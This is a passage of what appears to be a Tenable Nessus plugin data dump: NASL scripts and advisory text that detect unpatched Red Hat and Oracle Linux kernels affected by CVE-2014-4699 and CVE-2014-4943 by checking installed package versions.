script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0925\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"perf-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"perf-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"python-perf-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.46.2.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:38:30", "references": ["https://oss.oracle.com/pipermail/el-errata/2014-July/004233.html", "https://oss.oracle.com/pipermail/el-errata/2014-July/004232.html"], "pluginID": "76602", "description": "Description of changes:\n\n[2.6.39-400.215.4.el6uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229505] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230690] {CVE-2014-4699}", "edition": 2, "reporter": "Tenable", "published": "2014-07-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "nessus", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3047)", "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "modified": "2015-12-01T00:00:00", "id": "ORACLELINUX_ELSA-2014-3047.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76602", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3047.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76602);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/12/01 17:35:11 $\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3047)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.215.4.el6uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha \nLevin) [Orabug: 19229505] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) \n[Orabug: 19230690] {CVE-2014-4699}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004232.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004233.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.39-400.215.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.39-400.215.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.39-400.215.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.39-400.215.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.39-400.215.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.39-400.215.4.el5uek\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.215.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.215.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.215.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.215.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.215.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.215.4.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-30T13:41:40", "references": ["http://rhn.redhat.com/errata/RHSA-2014-0923.html", "https://www.redhat.com/security/data/cve/CVE-2014-4699.html", "https://www.redhat.com/security/data/cve/CVE-2014-4943.html"], "pluginID": "76906", "description": "Updated kernel packages that fix two security issues are now available for Red Hat Enterprise Linux 7.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2014-07-30T00:00:00", "title": "RHEL 7 : kernel (RHSA-2014:0923)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-07-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2014-0923.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76906", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0923. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76906);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_xref(name:\"RHSA\", value:\"2014:0923\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2014:0923)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 7.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a\ntraced process' instruction pointer to be set to a non-canonical\nmemory address without forcing the non-sysret code path when returning\nto user space. A local, unprivileged user could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel\nCPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting\nCVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4699.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4943.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0923.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0923\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", 